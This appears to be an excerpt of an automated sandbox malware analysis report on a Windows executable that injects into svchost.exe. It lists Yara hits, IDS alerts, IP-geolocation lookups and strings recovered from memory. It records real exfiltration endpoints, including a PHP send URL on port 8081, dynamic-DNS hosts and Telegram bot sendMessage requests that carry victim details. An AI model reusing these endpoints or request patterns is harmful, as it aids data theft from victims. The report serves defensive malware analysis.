              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49733 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49802 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49838 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49710 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49827 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49746 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49797 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49727 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49853 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49768 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49788 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49823 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49874 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49778 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49833 -> 188.114.96.3:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,3_2_004E4EB5
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 03 Jan 2025 08:21:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 03 Jan 2025 08:21:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1439914408.0000000007D25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546302746.000000000367F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20a
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
